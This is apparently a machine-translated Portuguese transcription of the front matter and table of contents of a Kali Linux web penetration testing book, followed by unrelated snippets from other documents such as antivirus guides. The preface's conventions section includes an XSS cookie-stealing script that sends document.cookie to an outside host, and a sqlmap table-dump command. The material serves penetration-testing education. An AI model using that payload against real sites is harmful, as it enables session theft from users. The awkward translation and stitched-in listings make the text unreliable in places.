Teste de Invasão Web com Kali Linux

Tamanho: px
Começar a partir da página:

Download "Teste de Invasão Web com Kali Linux"

Transcrição

1

2 Teste de Invasão Web com Kali Linux Um guia prático para a implementação de testes de penetração estratégias em sites, aplicações web e padrão protocolos da web com Kali Linux. José Muniz Aamir Lakhani BIRMINGHAM - MUMBAI

3 Teste de Invasão Web com Kali Linux Copyright 2013 Packt Publishing Todos os direitos reservados. Nenhuma parte deste livro pode ser reproduzida, armazenada em um sistema, ou transmitida de qualquer forma ou por qualquer meio, sem a prévia e por escrito permissão do editor, exceto no caso de breves citações embutidas em artigos ou críticas. Todo esforço foi feito na preparação deste livro para garantir a precisão das informações apresentadas. No entanto, a informação contida neste livro é vendido sem garantia, expressa ou implícita. Nem os autores, nem Packt Publishing, e os seus revendedores e distribuidores serão responsáveis por quaisquer danos causados ou supostamente causados direta ou indiretamente por este livro. Packt Publishing tem se esforçado para fornecer informações sobre marca registrada de todos os empresas e produtos mencionados neste livro através da utilização adequada de capitais. No entanto, Packt Publishing não pode garantir a precisão das informações. Data de publicação: setembro 2013 Referência de Produção: Publicado por Packt Publishing Ltd. Livery Lugar 35 Livery Rua Birmingham B3 2PB, Reino Unido. ISBN Cubra Imagem por Karl Moore ukonline.co.uk) [FM-2]

4 Créditos Autores José Muniz Aamir Lakhani Revisores Adrian Hayter Danang Heriyadi Tajinder Singh Kalsi Brian Sak Kunal Sehgal Nitin.K. Sookun (ISH) Coordenador do Projeto Anugya Khurana Revisores Christopher Smith Clyde Jenkins Indexador Monica Ajmera Mehta Gráficos Ronak Dhruv Aquisição do Editor Vinay Argekar Coordenador de Produção Aditi Gajjar Editor Técnico chumbo Amey Varangaonkar Capa Trabalho Aditi Gajjar Editores Técnicos Pooja Arondekar Sampreshita Maheshwari Menza Mathew [FM-3]

5 Sobre os autores José Muniz é um arquiteto de soluções técnicas e de segurança pesquisador. Ele começou sua carreira em desenvolvimento de software e redes depois gerida como um contratado recurso técnico. Joseph mudou-se para consultoria e descobriu uma paixão por segurança durante a reunião com uma variedade de clientes. Ele esteve envolvido com o projeto e implementação de vários projetos que vão desde empresas Fortune 500 para grandes redes federais. Joseph é executado TheSecurityBlogger.com site, um dos recursos mais populares sobre segurança e implementação do produto. Você também pode encontrar Joseph falando em eventos ao vivo, bem como com outras publicações envolvido. Os acontecimentos recentes incluem alto-falante for Social Mídia Deception na conferência ASIS Internacional de 2013, alto-falante para Eliminar Rede pontos cegos com webinar Data Center Segurança, alto-falante para fazer Trazer Seu próprio dispositivo (BYOD) Trabalhar no Solutions Forum Governo, Washington DC, e um artigo sobre a comprometer senhas em PenTest Magazine - Backtrack Compêndio, julho de Fora do trabalho, ele pode ser encontrado por trás de toca-discos de vinil arranhando clássico ou no o campo de futebol mexer com os clubes locais. Este livro não poderia ter sido feito sem o apoio da minha encantadora esposa Ning e inspirações criativas da minha filha Raylin. Eu também deve creditar a minha paixão por aprender a meu irmão Alex, que me criou junto com meus pais amorosos Irene e Ray. E eu gostaria de dar um agradecimento final que a todos os meus amigos, familiares e colegas que me apoiaram ao longo dos anos. [FM-4]

6 Aamir Lakhani é uma das principais Cyber Security e Cyber Contra arquiteto. Ele é responsável pelo fornecimento de soluções de TI de segurança para grandes comercial e organizações empresariais federais. Lakhani lidera projetos que implementam posturas de segurança para empresas da Fortune 500, o Departamento de Defesa dos EUA, os principais provedores de saúde, instituições de ensino, e financeira e organizações de mídia. Lakhani projetou contra-ofensiva medidas de defesa para as agências de defesa e inteligência e organizações tem assistido em defender-se do ataque ativo de volta os ataques perpetrados por metro grupos cibernéticos. Lakhani é considerado um líder na indústria de apoio detalhado compromissos de arquitetura e projetos sobre tópicos relacionados à defesa cibernética, mobile ameaças de aplicação, malware e ameaças persistentes avançadas de pesquisa (APT), e Segurança das Trevas. Lakhani é o autor e colaborador de vários livros, e tem apareceu na National Public Radio como um especialista em Cyber Security. Escrevendo sob o pseudônimo de Dr. Chaos, Lakhani também opera o DrChaos.com blogue. Em sua lista recente de 46 federais Tecnologia Peritos para Siga no Twitter, a Forbes revista descreveu Aamir Lakhani como "um blogueiro, especialista infosec, super-herói... e todo bom homem. " Eu gostaria de dedicar este livro aos meus pais, e Mahmood Nasreen, e irmãs, e Noureen Zahra. Obrigado por sempre incentivando o pequeno hacker mim. Eu não poderia ter feito isso sem seu apoio. Obrigado mãe e pai por seus sacrifícios. Eu faria Também gosto também de agradecer aos meus amigos e colegas para o seu incontável encorajamento e orientação. Estou verdadeiramente abençoado para ser trabalhando com as pessoas mais inteligentes e mais dedicadas do mundo. [FM-5]

7 Sobre os Revisores Adrian Hayter é um testador de penetração com mais de 10 anos de experiência em e desenvolvimento quebrar em aplicações web. Ele possui um Mestrado licenciatura em Segurança da Informação e uma licenciatura Formado em Ciência da Computação pela Royal Holloway, Universidade de Londres. Danang Heriyadi é um pesquisador de segurança de computadores indonésia especializada em engenharia e software exploração reversa com mais de cinco anos mãos na experiência. Ele está atualmente trabalhando em Hatsecure como um instrutor para "Exploit avançada e Shellcode Desenvolvimento ". Como pesquisador, ele gosta de compartilhar o conhecimento de TI Segurança em seu blog em FuzzerByte (http://www.fuzzerbyte.com). Gostaria de agradecer aos meus pais por me dar vida, sem eles, eu não estaria aqui hoje, minha namorada para me apoiar cada dia com sorriso e amor, meus amigos, que eu não posso descrever um por um. [FM-6]

8 Tajinder Singh Kalsi é o co-fundador e Chief Technical Evangelist em Virscent Technologies Pvt. Ltd, com mais de seis anos de experiência de trabalho na área de TI. Ele começou sua carreira com WIPRO como Associate Técnico, e mais tarde tornou-se Consultor cum instrutor de TI. A partir de agora, ele realiza seminários em faculdades em todo Índia, sobre temas, tais como a segurança da informação, desenvolvimento de aplicações Android, computing desenvolvimento de sites, e nuvem, e cobriu mais de 100 faculdades e cerca de 8500 estudantes, mais até agora. Além de treinamento, ele também mantém um blog (www.virscent.com / blog), Que bate em vários truques de hackers. Pegá-lo no facebook em-www.facebook.com / tajinder.kalsi.tj ou seguir o seu sítiowww.tajinderkalsi.com. Gostaria especialmente de agradecer Krunal Rajawadha (Autor Executivo de Relacionamento na Packt Publishing) para vir através de mim através do meu blog e me oferecer esta oportunidade. Gostaria também de agradecer à minha família e amigos íntimos para me apoiar quando eu estava trabalhando neste projeto. Brian Sak, CCIE # 14441, é atualmente um Arquiteto de Soluções Técnico da Cisco Sistemas, onde ele está envolvido no desenvolvimento de soluções e ajuda os parceiros da Cisco construir e melhorar os seus serviços de consultoria. Antes da Cisco, Brian realizada segurança serviços de consultoria e avaliação para grandes instituições financeiras, governo dos EUA organismos e empresas da Fortune 500. Ele tem quase 20 anos de indústria experiência com a maioria dos que passaram em Segurança da Informação. Além de inúmeras certificações de segurança e da indústria técnicas, Brian tem um mestrado em Segurança da Informação e Assurance, e é um contribuinte para o Centro de Internet Security e outros livros e publicações com foco em segurança. [FM-7]

9 Kunal Sehgal (KunSeh.com) Entrou no setor de segurança de TI após a conclusão o curso de segurança do ciberespaço da faculdade da Geórgia (Canadá), e tem sido associado com organizações financeiras desde então. Isso não só lhe deu experiência em um lugar onde a segurança é crucial, mas também lhe forneceu valiosos conhecimentos especializados no campo. Atualmente, ele dirige está dirigindo as operações de TI de segurança, para a Região APAC de um dos maiores bancos europeus. No geral, ele tem cerca de 10 anos de experiência em diversas funções que vão desde a avaliação de vulnerabilidade, a governança de segurança e de avaliação de risco para monitoramento de segurança. Ele possui uma série de certificações para o seu nomear, incluindo própria OSCP do Backtrack, e outros, como TCNA, CISM, CCSK, Security +, roteador Cisco de Segurança, ISO LA, ITIL. Nitin Sookun (MBCS) é um nerd apaixonado que residem no coração de Oceano Índico, na bela ilha de Maurício. Ele começou sua carreira de computação como empresário e fundou Indra Co. Ltd. Na busca de mais um desafio, ele entregou a gestão do negócio sobre a sua família e se juntou Linkbynet indiano Oceano Ltd como Engenheiro de sistema Unix / Linux. Ele é atualmente um engenheiro da Laranja Serviços às empresas. Nitin tem sido um defensor opensuse desde 2009 e passa seu tempo livre evangelizando Linux e FOSS. Ele é um membro ativo de vários grupos de usuários e projetos de código aberto, entre elas opensuse Project, MATE Project Desktop, Fundação Software Livre, Linux User Group de Maurício, eo Maurício Artesanato de software comunitário. Ele gosta de scripting em Bash, Perl, e Python, e geralmente publica seu trabalho sobre seu blog. Seu mais recente trabalho "Projeto Evil Genius" é um roteiro adaptado para porta / install Ferramentas de Teste de Invasão em opensuse. Seus tutoriais são muitas vezes traduzidos para vários línguas e compartilhada dentro da comunidade open source. Nitin é um pensador livre e acredita em compartilhar conhecimento. Ele gosta de socializar com os profissionais de vários campos. [FM-8]

10 Arquivos de suporte, ebooks, ofertas de desconto e mais Você pode querer visitar para os arquivos de suporte e downloads relacionados ao seu livro. Você sabia que Packt oferece versões e-book de todos os livros publicados, com PDF e arquivos disponíveis epub? Você pode atualizar para a versão e-book em com e como um cliente livro impresso, você tem direito a um desconto na cópia ebook. Entre em contato com a gente no para mais detalhes. Em Você também pode ler uma coleção de artigos técnicos gratuitos, sinal -se para uma série de boletins informativos gratuitos e receber descontos exclusivos e ofertas em Packt livros e ebooks. TM Você precisa de soluções imediatas para suas perguntas de TI? PacktLib está online de Packt biblioteca de livros digitais. Aqui, você pode acessar, ler e pesquisar em toda Packt biblioteca de livros. Por que assinar? Totalmente pesquisável através de cada livro publicado pela Packt Copiar e colar, imprimir e conteúdo favorito On demand e acessível via navegador Acesso gratuito para os titulares de contas Packt Se você tiver uma conta com a Packt Você pode usar isso para o acesso PacktLib hoje e vista nove livros totalmente gratuitos. Basta usar suas credenciais de login para acesso imediato. [FM-9]

11

12 Índice analítico Prefácio Capítulo 1: Teste de Invasão e Configuração Conceitos de testes de penetração de aplicativos Web Metodologia Teste de Invasão Calculando risco Conceitos Kali Testes de Penetração Passo 1 - Reconhecimento Etapa 2 - Avaliação Alvo Passo 3 - Exploração Passo 4 - Privilege Escalation Passo 5 - a manutenção de um ponto de apoio Apresentando Kali Linux Configuração do sistema Kali Correndo Kali Linux a partir de uma mídia externa Instalando Kali Linux Kali Linux e VM imagem primeira corrida Visão geral ferramentas Kali Resumo Capítulo 2: Reconhecimento 33 Objetivos de reconhecimento A pesquisa inicial Site da empresa Fontes de história Web Registros Regionais da Internet (RIRs) Eletrônico coleta de dados, análise e recuperação (EDGAR) Recursos de mídia social Confiança

13 Índice analítico Postagens de emprego Localização Shodan Google hackers Google Hacking Banco de Dados Pesquisando redes HTTrack - clonar um site Técnicas de reconhecimento de ICMP Técnicas de reconhecimento DNS Identificação do alvo DNS Gráficos de coleta de informações - Maltego Nmap FOCA - site metadados Reconnaissance Resumo Ataques do lado do servidor: Capítulo 3 A avaliação da vulnerabilidade Webshag Skipfish ProxyStrike Vega OWASP-Zap Websploit Exploração Metasploit w3af Explorando os sistemas de Ataques de força bruta Hidra DirBuster WebSlayer Cracking senhas John the Ripper Man-in-the-middle Tira SSL Iniciando o ataque - redirecionamento Configurando o redirecionamento de porta usando o Iptables Resumo Ataques do lado do cliente: Capítulo 4 A engenharia social Engenharia Social Toolkit (SET) Usando SET para clonar e ataque [Ii]

14 Índice analítico MitM Proxy Hospedar digitalização Hospedar digitalização com Nessus Instalando o Nessus em Kali Usando o Nessus Obtenção e rachaduras senhas de usuários As senhas do Windows Montagem do Windows Senhas Linux Kali quebra de senha ferramentas Johnny hashcat e oclhashcat samdump2 chntpw Ophcrack Crunch Outras ferramentas disponíveis no Kali Hash-identificador dictstat RainbowCrack (rcracki_mt) findmyhash phrasendrescher CmosPwd creddump Resumo Autenticação Atacar: Capítulo 5 Atacar o gerenciamento de sessões Clickjacking Cookies de sessão Sequestro web Sessão de Ferramentas Web Plugins do Firefox Firesheep - Plugin do Firefox Web Developer - Plugin do Firefox Greasemonkey - Plugin do Firefox Biscoito Injector - Plugin do Firefox Os cookies Gestor + - Plugin do Firefox Biscoito Cadger Wireshark Hamster e Ferret Man-in-the-middle ataque dsniff e arpspoof [Iii]

15 Índice analítico Ettercap Emalhe SQL Injection SqlMap Cross-site scripting (XSS) Testando cross-site scripting Cookie de XSS roubo / sequestro Autenticação Outras ferramentas urlsnarf acccheck hexinject Patator DBPwAudit Resumo Capítulo 6: Ataques Web Exploração Navegador Quadro - Carne FoxyProxy - Plugin do Firefox BURP Proxy OWASP - ZAP Colheita senha SET Fimap Negação de Serviços (DoS) THC-SSL-DOS Scapy SlowLoris Low Orbit Ion Canhão Outras ferramentas DNSCHEF SniffJoke Cerco Inundator TCPReplay Resumo Capítulo 7: contramedidas defensivas 251 Testando suas defesas Segurança da linha de base STIG O gerenciamento de patches As diretivas de senha [Iv]

16 Índice analítico Espelhe o seu ambiente HTTrack Outras ferramentas de clonagem Man-in-the-middle defesa Defesa tira SSL Negação de Serviço defesa Defesa de Cookies Defesa Clickjacking Forense digital Kali Forensics Bota Análise do Sistema de Arquivos com Kali dc3dd Outras ferramentas forenses em Kali chkrootkit Autópsia Binwalk pdf-parser Principal Pasco Bisturi bulk_extractor Resumo Capítulo 8: Teste de Penetração Relatório Executivo Observância Os padrões da indústria Serviços profissionais Documentação Formato do relatório Capa Declaração de Confidencialidade Controle de documentos Timeline Resumo executivo Metodologia Procedimentos de teste detalhadas Resumo dos resultados Vulnerabilidades Considerações de rede e recomendações Apêndices Glossário [V]

17 Índice analítico Declaração de Trabalho (SOW) Teste de Invasão Externa Material adicional SOW Kali ferramentas de relatórios Dradis KeepNote Maltego CaseFile MagicTree CutyCapt Exemplos de relatórios Resumo Índice 313 [Vi]

18 Prefácio Kali é um arsenal Teste de Invasão baseado no Debian Linux usado por segurança profissionais (e outros) para realizar avaliações de segurança. Kali oferece uma variedade de conjuntos de ferramentas personalizadas para identificar e explorar vulnerabilidades em sistemas. Este livro é escrito ferramentas de alavancagem disponíveis em Kali Linux liberados 13 de março, 2013, bem como outras aplicações de código aberto. Teste de Invasão Web com Kali Linux é projetado para ser um guia para profissionais Testadores de penetração que procuram incluir Kali em uma penetração de aplicações web noivado. Nosso objetivo é identificar a melhor ferramenta de Kali (s) para uma tarefa específica, fornecer detalhes sobre como usar o aplicativo (s), e oferecem exemplos do que informações poderia ser obtida para fins de com base em experiência de campo especialista relatório. Kali tem vários programas e utilitários, no entanto, este livro vai concentrar-se na ferramenta mais forte (s) para uma tarefa específica no momento da publicação. Os capítulos deste livro são divididos em tarefas utilizados na aplicação web do mundo real Teste de Invasão. Capítulo 1, testes de penetração e de instalação, fornece uma visão geral Testes de Penetração conceitos básicos, estratégias de serviços profissionais, fundo sobre o meio ambiente Kali Linux, ea criação de Kali para temas apresentados neste livro. Capítulos 2-6, abrangem vários aplicativos web conceitos de testes de penetração, incluindo exemplos de configuração e relatórios destinados a destacar temas abordados se pode realizar seu objetivo desejado. Capítulo 7, contramedidas defensivas, serve como uma fonte de reparação em sistemas vulnerável a ataques apresentados nos capítulos anteriores. Capítulo 8, Teste de Penetração Relatório Executivo, oferece relatórios melhores práticas e exemplos que podem servir como modelos para a construção de relatórios de nível executivo. O objetivo de projetar o livro em desta forma é dar ao leitor um guia para envolver uma penetração de aplicações web com a ferramenta melhor possível (s) disponível em Kali, oferecer medidas para remediar uma vulnerabilidade e fornecer dados capturados como poderia ser apresentada de uma forma profissional.

19 Prefácio O que este livro cobre Capítulo 1, testes de penetração e de instalação, abrange os fundamentos da construção de uma prática profissional Teste de Invasão. Os tópicos incluem a diferenciação de um Teste de Penetração de outros serviços, descrição da metodologia e direcionamento aplicações web. Este capítulo também fornece passos utilizados para configurar uma Kali Ambiente Linux para tarefas abordados neste livro. Capítulo 2, Reconhecimento, fornece várias maneiras de coletar informações sobre um alvo. Os tópicos incluem ferramentas gratuitas populares destacando disponíveis na Internet como bem como a recolha de informação utilitários disponíveis em Kali Linux. Capítulo 3, os ataques lado do servidor, centra-se na identificação e exploração de vulnerabilidades em servidores web e aplicações. Ferramentas cobertos estão disponíveis em Kali ou outro aberto utilitários de origem. Capítulo 4, Ataques lado do cliente, alvos hospeda sistemas. Os tópicos incluem a engenharia social, explorando vulnerabilidades do sistema host e atacando as senhas, pois são os mais meio comum para proteger os sistemas host. Capítulo 5, Atacar de autenticação, analisa a forma como os usuários e dispositivos para autenticar web aplicações. Os tópicos incluem a segmentação do processo de gerenciamento de sessões de autenticação, comprometer a forma como os dados são armazenados em sistemas host, e man-in-the-middle ataque Capítulo 6, ataques na Web, explora como tirar proveito de servidores web e técnicas. Este capítulo também aborda brevemente em SQL e ataques Cross-Site Scripting. aplicações web que utilizam exploits de compromisso como a exploração de navegador, procuração ataques, e colheita de senha. Este capítulo abrange igualmente os métodos para interromper serviços utilizando técnicas de negação de serviço. Capítulo 7, contramedidas defensivas, fornece as melhores práticas para o seu endurecimento aplicações web e servidores. Os tópicos incluem linhas de base de segurança, gerenciamento de patches, políticas de senha, e defender-se contra os métodos de ataque abordados no anterior capítulos. Este capítulo também inclui uma seção forense focados, pois é importante para investigar adequadamente um ativo comprometido para evitar impacto negativo adicional. Capítulo 8, Penetração Teste Relatório Executivo, abrange as melhores práticas para o desenvolvimento de Penetração pós relatórios de serviço de teste profissionais. Os tópicos incluem uma visão geral de métodos para agregar valor ao seu produto final, a formatação do documento e os modelos que pode ser usado para construir relatórios profissionais. [2]

20 O que você precisa para este livro Prefácio Os leitores devem ter uma compreensão básica de aplicações web, networking conceitos e metodologia de testes de penetração. Este livro vai incluir detalhada exemplos de como executar um ataque usando ferramentas oferecidas em Kali Linux, bem como outras aplicações de código aberto. Não é necessário, mas benéfico ter experiência usando versões anteriores do Backtrack ou programas similares. Os requisitos de hardware para a construção de um ambiente de laboratório e criação da Kali Arsenal Linux são abordados em Capítulo 1, testes de penetração e de Instalação. Que este livro é para O público-alvo deste livro são testadores de penetração profissionais ou outros olhando para maximizar Kali Linux para um Teste de Invasão do servidor web ou aplicação exercício. Se você está procurando identificar como realizar um teste de penetração contra aplicações web e achados a um cliente é uma forma profissional, em seguida, este livro é para você. Convenções Neste livro, você vai encontrar uma série de estilos de texto que distinguem entre diferentes tipos de informação. Aqui estão alguns exemplos desses estilos, e um explicação do seu significado. Palavras de código no texto são apresentados da seguinte forma: "Por exemplo, você pode ligar para o perfil My First Scan ou qualquer outra coisa que você gostaria. " Um bloco de código é definido da seguinte forma: <script> document.write ("<img src = 'http://kali.drchaos.com/var/www/xss_ laboratório / lab_script.php? "+ document.cookie +"> ") </ script> Qualquer entrada de linha de comando ou a saída é escrita da seguinte forma: SqlMap-u teste - despejo -T-L tablesnamehere -U teste-dump [3]

21 Prefácio Novos termos e palavras importantes são mostradas em negrito. As palavras que você vê na tela, em menus ou caixas de diálogo, por exemplo, aparecem no texto assim: "Em breve como nós, clique no Executar botão, nós recebemos uma injeção de SQL ". Avisos ou notas importantes aparecem em uma caixa como esta. Dicas e truques aparecer assim. Feedback do leitor O feedback dos nossos leitores é sempre bem-vindo. Deixe-nos saber o que você pensa Neste livro, o que você gostou ou não gostou pode ter. Feedback do leitor é importante para o nos a desenvolver títulos que você realmente tirar o máximo proveito de. Para nos enviar feedback geral, basta enviar um para e mencionar o título do livro através do assunto da mensagem. Se existe um tema que você tem experiência em e você está interessado em qualquer escrita ou contribuir para um livro, consulte o nosso guia autor em / autores. Atendimento ao Cliente Agora que você é o orgulhoso proprietário de um livro Packt, temos uma série de coisas para ajudá-lo a obter o máximo de sua compra. Errata Embora tenhamos tomado todos os cuidados para garantir a exatidão dos nossos conteúdos, erros acontecem. Se você encontrar um erro em um dos nossos livros, talvez um erro no texto ou o código-ficaríamos muito gratos se você iria relatar isso para nós. Ao fazer isso, você pode salvar outros leitores de frustração e nos ajudar a melhorar as versões subseqüentes deste livro. Se você encontrar qualquer errata, por favor informe-los visitando com.br / submeter-errata, A seleção de seu livro, clicando no formulário de apresentação de errata link, e inserir os detalhes da sua errata. Uma vez que seu errata são verificados, a sua submissão Serão aceitos ea errata será carregado no nosso site, ou adicionado a qualquer lista de errata existente, sob a seção Errata desse título. Qualquer errata existente pode ser visto seleccionando o seu título de [4]

22 Pirataria Prefácio A pirataria de material com direitos autorais na internet é um problema constante em todas as mídias. No Packt, tomamos a proteção de nossos direitos autorais e licenças muito a sério. Se você deparar com as cópias ilegais de nossos trabalhos, sob qualquer forma, na internet, por favor nos fornecer o endereço de localização ou nome do site imediatamente para que possamos buscar um remédio. Entre em contato conosco com um link para a suspeita material pirateado. Agradecemos a sua ajuda na proteção de nossos autores, e nossa capacidade de trazer você um conteúdo valioso. Perguntas Você pode contatar-nos em se você está tendo um problema com qualquer aspecto do livro, e nós faremos o nosso melhor para resolvê-lo. [5]

23

24 Teste de Invasão e Configuração Muitas organizações oferecem serviços de segurança e de uso de termos tais como auditoria de segurança, rede ou avaliação de risco, e Penetration Test com significados sobrepostos. Por definição, uma auditoria é uma avaliação técnica mensurável de um sistema (s) ou aplicativo (s). As avaliações de segurança são as avaliações de risco, ou seja, os serviços usado para identificar vulnerabilidades em sistemas, aplicações e processos. Teste de Invasão vai além de uma avaliação através da avaliação identificado vulnerabilidades para verificar se a vulnerabilidade é real ou um falso positivo. Por exemplo, uma auditoria ou uma avaliação pode utilizar ferramentas de verificação que fornecem algumas centenas possíveis vulnerabilidades em vários sistemas. Um teste de penetração tentaria para atacar essas vulnerabilidades da mesma maneira como um hacker malicioso para verificar quais vulnerabilidades são genuínos reduzir a lista verdadeira das vulnerabilidades do sistema para um punhado de falhas de segurança. Os Testes de Penetração mais eficazes são os que que visam um sistema muito específico, com um objetivo muito específico. Qualidade sobre a quantidade é o verdadeiro teste de um teste de penetração bem-sucedida. Enumerando um único sistema durante um ataque direcionado revela mais sobre a segurança do sistema e tempo de resposta para lidar com incidentes que ataque amplo espectro. Escolhendo cuidadosamente alvos valiosos, uma Verificador da penetração pode determinar toda a infra-estrutura de segurança e associado risco de um ativo valioso. O Teste de Invasão não tornar as redes mais seguras!

25 Teste de Invasão e Configuração Esta é uma má interpretação comum e deve ser claramente explicado a todos os potenciais clientes. Teste de Invasão avalia a eficácia da segurança existente. Se um cliente não tem uma forte segurança, em seguida, eles vão receber pouco valor a partir de Serviços de testes de penetração. Como consultor, recomenda-se que a penetração Os serviços de análise são oferecidos como forma de verificar a segurança para os sistemas existentes, uma vez um cliente acredita que eles tenham esgotado todos os esforços para assegurar a esses sistemas e são pronto para avaliar se existem lacunas existentes na obtenção desses sistemas. Posicionando um escopo adequado de trabalho é fundamental quando a venda de serviços de testes de penetração. O escopo do trabalho define o que os sistemas e as aplicações estão a ser alvo, bem como o que conjuntos de ferramentas podem ser usadas para comprometer vulnerabilidades que são encontradas. Melhores práticas está a trabalhar com o seu cliente durante uma sessão de design para desenvolver um escopo aceitável de Teste trabalho de Invasão que não Web tem com impacto Kali Linux-o sobre o próxima valor dos geração resultados. de BackTrack-se uma hands-on guia que irá fornecer-lhe passo-a-passo métodos para encontrar vulnerabilidades e exploração de aplicações web. Este livro vai cobrir alvos pesquisando, identificando e exploração de vulnerabilidades em aplicações web, bem como os clientes que usam web serviços de aplicação, defendendo aplicações web contra ataques comuns, e edifício Teste de Invasão os produtos para a prática de serviços profissionais. Nós acredito que este livro é ótimo para quem está interessado em aprender como se tornar um Verificador da penetração, os usuários que são novos para Kali Linux e querem aprender as características e as diferenças de Kali contra BackTrack, e testadores de penetração experientes que podem precisa de uma reciclagem ou de referência sobre novas ferramentas e técnicas. Este capítulo vai quebrar os conceitos fundamentais por trás vários segurança serviços, bem como orientações para a construção de uma prática profissional Teste de Invasão. Conceitos incluem diferenciar um teste de penetração de outros serviços, a metodologia visão geral, e visando aplicações web. Este capítulo também fornece uma breve visão geral da criação de um teste de Kali Linux ou ambiente real. Teste de Invasão aplicação Web conceitos A aplicação web é qualquer aplicativo que usa um navegador web como um cliente. Esta lata ser um fórum de mensagens simples ou uma folha de cálculo muito complexo. As aplicações web são popular baseado na facilidade de acesso a serviços e gerenciamento centralizado de um sistema utilizado por vários partidos. Requisitos para acessar um aplicativo web pode seguir padrões de cliente navegador indústria simplificar as expectativas, tanto do prestadores de serviços, bem como os anfitriões acessar o aplicativo. [8]

ESET NOD32 ANTIVIRUS 6

ESET NOD32 ANTIVIRUS 6 ESET NOD32 ANTIVIRUS 6 Microsoft Windows 8 / 7 / Vista / XP / Home Server Guia de Inicialização Rápida Clique aqui para fazer download da versão mais recente deste documento O ESET NOD32 Antivirus fornece

Leia mais

ESET NOD32 ANTIVIRUS 8

ESET NOD32 ANTIVIRUS 8 ESET NOD32 ANTIVIRUS 8 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Guia de Inicialização Rápida Clique aqui para fazer download da versão mais recente deste documento

Leia mais

ESET NOD32 ANTIVIRUS 9

ESET NOD32 ANTIVIRUS 9 ESET NOD32 ANTIVIRUS 9 Microsoft Windows 10 / 8.1 / 8 / 7 / Vista / XP Guia de Inicialização Rápida Clique aqui para fazer download da versão mais recente deste documento O ESET NOD32 Antivirus fornece

Leia mais

Política de segurança de rede: White Paper de práticas recomendadas

Política de segurança de rede: White Paper de práticas recomendadas Política de segurança de : White Paper de práticas recomendadas Índice Introdução Preparação Criar declarações de política de uso Realizar uma análise de risco Estabelecer uma Estrutura de Equipe de Segurança

Leia mais

PARA MAC. Guia de Inicialização Rápida. Clique aqui para fazer o download da versão mais recente deste documento

PARA MAC. Guia de Inicialização Rápida. Clique aqui para fazer o download da versão mais recente deste documento PARA MAC Guia de Inicialização Rápida Clique aqui para fazer o download da versão mais recente deste documento ESET Cyber Security fornece proteção de última geração para seu computador contra código mal-intencionado.

Leia mais

Guia de Usuário do Gateway do Avigilon Control Center. Versão 5.6

Guia de Usuário do Gateway do Avigilon Control Center. Versão 5.6 Guia de Usuário do Gateway do Avigilon Control Center Versão 5.6 2006-2015 Avigilon Corporation. Todos os direitos reservados. A menos que seja expressamente concedida por escrito, nenhuma licença será

Leia mais

ESET NOD32 Antivirus 4 para Linux Desktop. Guia de Inicialização Rápida

ESET NOD32 Antivirus 4 para Linux Desktop. Guia de Inicialização Rápida ESET NOD32 Antivirus 4 para Linux Desktop Guia de Inicialização Rápida O ESET NOD32 Antivirus 4 fornece proteção de última geração para o seu computador contra código malicioso. Com base no mecanismo de

Leia mais

Faculdade de Tecnologia SENAI Porto Alegre Aula 1

Faculdade de Tecnologia SENAI Porto Alegre Aula 1 Faculdade de Tecnologia SENAI Porto Alegre Aula 1 Prof. Me. Humberto Moura humberto@humbertomoura.com.br Evolução da TI Postura TI Níveis de TI Princípios de TI (papel da TI perante o negócio) Arquitetura

Leia mais

para Mac Guia de Inicialização Rápida

para Mac Guia de Inicialização Rápida para Mac Guia de Inicialização Rápida O ESET Cybersecurity fornece proteção de última geração para o seu computador contra código malicioso. Com base no ThreatSense, o primeiro mecanismo de verificação

Leia mais

Relatório sobre Segurança da Informação nas Empresas RESULTADOS DA AMÉRICA LATINA

Relatório sobre Segurança da Informação nas Empresas RESULTADOS DA AMÉRICA LATINA 2011 Relatório sobre Segurança da Informação nas Empresas RESULTADOS DA AMÉRICA LATINA SUMÁRIO Introdução... 4 Metodologia... 6 Resultado 1: Cibersegurança é importante para os negócios... 8 Resultado

Leia mais

Guia do Usuário do Gateway do Avigilon Control Center. Versão 5.4.2

Guia do Usuário do Gateway do Avigilon Control Center. Versão 5.4.2 Guia do Usuário do Gateway do Avigilon Control Center Versão 5.4.2 2006-2014 Avigilon Corporation. Todos os direitos reservados. A menos que seja expressamente concedido por escrito, nenhuma licença é

Leia mais

ESET CYBER SECURITY PRO para Mac Guia de Inicialização Rápida. Clique aqui para fazer o download da versão mais recente deste documento

ESET CYBER SECURITY PRO para Mac Guia de Inicialização Rápida. Clique aqui para fazer o download da versão mais recente deste documento ESET CYBER SECURITY PRO para Mac Guia de Inicialização Rápida Clique aqui para fazer o download da versão mais recente deste documento ESET Cyber Security Pro fornece proteção de última geração para seu

Leia mais

Metodologias pentest. Prof. Nataniel Vieira nataniel.vieira@gmail.com

Metodologias pentest. Prof. Nataniel Vieira nataniel.vieira@gmail.com Metodologias pentest Prof. Nataniel Vieira nataniel.vieira@gmail.com Sumário Metodologias Abordagens existentes Fases de um pentest Principais técnicas Principais ferramentas Aplicações alvo 2 Hacking

Leia mais

Desenvolvimento e disponibilização de Conteúdos para a Internet

Desenvolvimento e disponibilização de Conteúdos para a Internet Desenvolvimento e disponibilização de Conteúdos para a Internet Por Matheus Orion OWASP A Open Web Application Security Project (OWASP) é uma entidade sem fins lucrativos e de reconhecimento internacional,

Leia mais

Sobre Nós. NossaVisão

Sobre Nós. NossaVisão 2015 Sobre Nós 1 ArtsSec foi fundada por um grupo de profissionais dedicados à segurança da informação a fim de proporcionar soluções criativas e de alto valor aos seus clientes. A empresa surgiu em 2012,

Leia mais

Qlik Sense Cloud. Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados.

Qlik Sense Cloud. Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados. Qlik Sense Cloud Qlik Sense 2.0.2 Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados. Copyright 1993-2015 QlikTech International AB. Todos os direitos reservados. Qlik, QlikTech,

Leia mais

Que informações nós coletamos, e de que maneira?

Que informações nós coletamos, e de que maneira? Política de Privacidade Vivertz Esta é a política de privacidade da Affinion International Serviços de Fidelidade e Corretora de Seguros Ltda que dispõe as práticas de proteção à privacidade do serviço

Leia mais

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão;

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão; initsec Proposta de pentest 1. O que é? Pentest (Penetration Test) é uma avaliação de maneira realista da segurança empregada em aplicações web e infraestruturas de TI no geral. O Pentest constitui da

Leia mais

